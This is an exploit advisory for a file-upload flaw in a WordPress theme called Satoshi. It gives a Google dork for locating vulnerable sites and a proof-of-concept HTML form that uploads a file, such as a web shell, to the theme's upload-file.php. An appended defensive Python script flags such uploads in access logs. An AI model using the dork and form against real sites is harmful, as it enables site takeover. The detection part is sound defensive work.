Satoshi Theme - File Upload CSRF - 3xploi7 BuG

#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================


Classification

Type : CSRF
OWASP Top 10 : A8: Cross-Site Request Forgery (CSRF)
CWE : CWE-352

Miscellaneous

Submitter : Anonymous
Views : 750
Verified : No
WPVDB ID : 7709

-- Proof Of Concept --

When vuln : -

CSRF : 


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Success : Succes

Shell Path : Here
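
For defenders, an added example (not part of the original advisory): a Python check that scans combined-format access logs for POST requests to the upload-file.php path used in the form above and labels each by where its Referer points. The site host blog.example and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Path taken from the action attribute of the form in the advisory.
UPLOAD_PATH = "/wp-content/themes/satoshi/upload-file.php"

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def classify_referer(referer, site_host):
    """Return 'missing', 'same-origin' or 'cross-origin' for a Referer value."""
    if referer in ("", "-"):
        return "missing"
    host = (urlsplit(referer).hostname or "").lower()
    return "same-origin" if host == site_host.lower() else "cross-origin"

def find_upload_posts(lines, site_host):
    """Return one finding per POST that reaches the theme's upload script."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Compare case-insensitively and ignore any query string.
        if urlsplit(m["uri"]).path.lower() != UPLOAD_PATH:
            continue
        findings.append({
            "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "origin": classify_referer(m["referer"], site_host),
        })
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Dec/2014:10:01:02 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 7 "http://other.example/page.html" "Mozilla/5.0"',
    '203.0.113.9 - - [06/Dec/2014:10:02:10 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 7 "-" "curl/7.38.0"',
    '192.0.2.4 - - [06/Dec/2014:10:03:00 +0000] "GET /wp-content/themes/satoshi/style.css HTTP/1.1" 200 512 "http://blog.example/" "Mozilla/5.0"',
    '192.0.2.4 - - [06/Dec/2014:10:04:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://blog.example/wp-login.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_upload_posts(SAMPLE_LOG, "blog.example"):
        print(finding)
```

Any hit is worth reviewing, since a theme file accepting direct POST uploads is unusual; cross-origin and missing Referer values are the ones consistent with a forged or scripted request.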